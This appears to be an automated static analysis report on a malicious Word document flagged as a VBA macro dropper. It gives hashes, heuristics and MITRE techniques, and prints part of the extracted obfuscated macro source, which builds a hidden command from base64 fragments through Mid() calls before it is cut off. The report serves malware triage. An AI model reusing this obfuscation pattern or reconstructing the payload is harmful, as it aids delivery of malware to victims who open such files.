Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7883d4b95c99c3b…

MALICIOUS

Office (OLE)

78.5 KB Created: 2017-11-06 14:56:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: 0bd0c327dbbe9787e9a04e91e3a09a2f SHA-1: 5714582df77ec85303df49f1d280d10bd30e1938 SHA-256: d7883d4b95c99c3bf3d9122b59647ecfe8eba5ddc27e7e4e18a43cae18d43c55
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_SHELL' heuristic indicates the presence of a Shell() call, and the 'macros.bas' file was extracted. The ClamAV detection 'Doc.Dropper.Agent-6367164-0' suggests this is a dropper. The VBA script attempts to reconstruct a string using Mid() calls, likely to form a command or URL for downloading a payload, but the full string could not be reconstructed due to truncation.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6367164-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6367164-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13484 bytes
SHA-256: ef05120737f14fbffd1703109d856bc2ed1745824bad1922d0573533f857f52b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qiWDlAhDS"
Function Xqckmzkwk()
CDBQozZJhMt = Mid("4dlAS14VSQAxADYANABhADQAMABJADcANQBiADQAMABJADEANQA2AGIAMQA0ADUAdwAxADYANwB3ADXzKot6MdLza84K9mEhz", 9, 70)
jpFFz = Mid("z5cjZAASgAxADYANAA8ADEANgA0ADwAMQA2ADAAdwA3ADIAYgA1ADcAdwA1ADcAYgAxADYAMwA8ADEANAAxAEoAMQA0ADMAUAAxADUANwBAADEANQA1AGz8lCOdRi6zz0IszC45YicO", 6, 112)
UkjCIcvTHHS = Mid("5RaOwjlQ2WozvWFZm7BoADQAMABQADEANgAyAEAAMQA0ADEAdwAxADUANgA8ADEANAA0AEAAMQA1ADcAeAAxADUANQBJADcAMwBhADQANABQADEANgA1AEAAMQA2ADIASgAxADUANAA8ADEANgAzAGIANAAwAGgANwA1AEAANAAwAEoANAA3ADwAMQA1ADOADhnw9ardjM", 19, 172)
lasjnQz = Mid("ImR5Wr7qJpvidTvaiCaZwJOgA6AFQATwBpAG4AdAAxADYAKAAgACgAIABbAFMAdABEpHkoJf7i", 23, 43)
MiHQjFPImm = Mid("L1jzDcxADUASQAxADQANQA8ADEANgBjm7D2AM", 7, 23)
wHPfqCdrSjq = Mid("1QANQBKADEANQA0AGIAMQA0ADUAeAAxADQAMwBKADEANgA0AEAAMQA2ADIAeAAxADUANwBhADEANQA2AGgAMQA1ADEAdwtKonkudjAHjO", 2, 92)
BaidKoznqYT = Mid("FkANAA1AFAAMQA1ADMAeAAxADUANAB3ADEANQA3AGIANQA2AGEAMQA0ADMAYQAxADUANwA8ADEANQA1AEkANQA2AEAAMQA2ADimrwvStaCowa5lcG", 3, 95)
jcAIjiRI = Mid("ZdpCJiN79nKz8F2sb0607qgA2AEoANgA1AEoANgA1AHgANgAzAGEANgA2AGIANQAxAEkANwAzAEoANAA0AHcAMQA2ADAAYgAxADQAMQBAADEANgA0AEAAM35uWrWjS", 23, 96)
qkhDGPiaMq = Mid("lkzW8NCLFd3ADEANAAzAGgAMQA0ADEAeAAxADYANABhADEANAAzAGEAMEK7", 11, 46)
HjpGJcK = Mid("dO9wBIACAAewAgACgAIABbAEMASABhAHIAXQAoACAAWwBDAE8AbgB2AEUAUgBUAF0ACI9zN9Hkkpmt8", 4, 63)
zVwRYo = Mid("7J68Xwo835HQ9pmffE9DUANgBAADEAMgAzAEoAMQA2ADAAYgAxADUANABAADEANQAxAGIAMQA2ADQAeAA1ADAAaAA0ADcAQAA1ADQASgA0ADcAPAA1ADEAYQA3ADMAQAA0ADQAPAAxADUANgBQADEANAAxAEoAMQA1ADUAYQAxADQANQBKADQAMABiADcANQBQADQAMABJADQANAB3ADEANgAjSEU", 20, 198)
UIpTFLDX = Mid("h8nUASQAxADQAMQB3ADUANwBJADEAMgAzAGEAMQA3ADEAeAAxADYAMABAADUANwBiADQANwBJAGdNDpOs", 4, 71)
iWtFEvM = Mid("Rz3bfAxADQAMwBAADEANgAwAGEAMQA1ADQAeAAxADQAMQBAADEANwAxAGgAMQA0ADcAaAAxADYAMgBhADEANQA3AEkAMQA2ADUAYQAxADUANgBAADEANAA0AHcANQA2AEkAMQA0ADQAdwAxADQA4pwQ8MM9JcX3iXu50", 6, 142)
WMLtaAV = Mid("udllJCvhiTZt9uwQjZpidwwRXvwC2ANQB3ADEANgAzAGIAMQA2ADMAdwA0ADAAaAAii", 30, 36)
winRXhncMio = Mid("ct7KjWAAxADMttu4rQjv32pGcwOnOij4Kj5R", 7, 6)
jfpuKIYRcLY = Mid("W3ULdphnn2fOWSnRM9A9E0XC6TxADQAMQBQADEANAA3AEoANQA2AHcAMQA1ADYAQAAxADQANQA8ADEANgA0AEoANQA3AGEDBMIIS42HjDEB", 27, 68)
kULjob = Mid("qZMIfBZv8JRGTiTO6ADEANgA0AGIAMQA0ADEAYQAxADYAMgB3ADEANgA0AEAANQA1AEAAMQAyADAAeAAxADYAMgB3ADEANQA3AHgAMQA0ADMAYgAxADQHmp", 18, 99)
ziskBwcYV = Mid("6sT67sbBANQA2AGIAMQA2ADQAUAA1ADYAYQAxADAANABhADEANQA3ADwAMQA2ADcAeAAxADqrpq7w8j7KJ", 9, 63)
OCHCERXj = Mid("TIwP6Em6TaHrKLazBJwXrFSI71L0d6LXhDUAdwAxADYANABQADUANgBhADEAMgA3AGgAMQA0ADUAYQAxADQAMgBKADEAMAAzAEkAMQA1ADQAUAAxADUAMQAFVm", 34, 86)
pQTsnHKt = Mid("mDKo3s4Fk1XmrUEiPjJ6jQ8UANQBQADEANQA3AEAAMQA0ADIAeAAxADUAMgA8ADEANAA1AHcAMQA0ADMAYgAxADYANAzkQ8siII0", 24, 68)
zizdMjlL = Mid("Ji7p1BirwlRcpNBobAMQA1ADIAeAAxADYAMgBJADEAMgA0AHgAMQA1ADYAPAA1ADcAYgA1ADQASQAxADUAMABhADEANgA0AGIAMQA2ADQAPAAxADYAMAA8ADcAMgBKADUANwBAADUANwBKADEANgAzADwAMQA2ADQAQAAxADQAMQB4ADEANQA0AHgAMQA2ADMASQAxADYANABiADEIBz4oiV958rYDjB", 18, 192)
KNzXiJtSdNM = Mid("lz34gAMQA0ADEAYgAxADYAMgBKADEANQA3AEoAMQA0ADMASQA1ADYAPAAxADQAMwB3ADEANQQ0l6HjIKEWQj0O4tDjTLA0o1EMF", 5, 68)
wJGEv = Mid("E2YTzLUUbM87AEANQAwAHgAMQA2ADQAYgAxADYANABJADEANgAwAFAANwAyAGEANQA3AGIANQA3AHcAMQA2ADMAYQAxADQANQBoADEANAAyAGIAMQA0ADEMGwNl4YtaTYH7ZE", 14, 105)
WRLWOFtiR = Mid("wb2FziEHA0ji3lPADYAafb7TYo5RAChYthv", 16, 5)
KAUDZsACnF = Mid("AUl6MNIlHA3AHgAMQA1ADUAdwA1ADcAUAAxADUANgBoADEANQAyAEoAMQA0ADYAaAAxADYANABiADEAMgA0AGEAMQAyADAAYQAxADUAMwBKADEAMAA2AEkANQA3ADwANQA0AGIAMQA1ADAASgAxADYANAA8ADEANgA0AGgAMQA2ADAASQA3ADIAaAA1ADcAYQA1ADcAYgAxADzZMvMoprmZXNYTwVVr", 10, 196)
vFuMfNmR = Mid("AEn6JOdTKPvJW5IABbAHMAdAByAGkATgBHAF0AOgA6AGoAbwBJAG4AKAAgACcAJwAgACwAIAAoACAAJwA0ADQAYgAxADYANwBhADEANgAzAGgAMQA0ADMAdwAxADYAMgBhlK", 15, 116)
DwTBbrLMA = Mid("v1jAAxADQANQBJADEANwAwAE
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.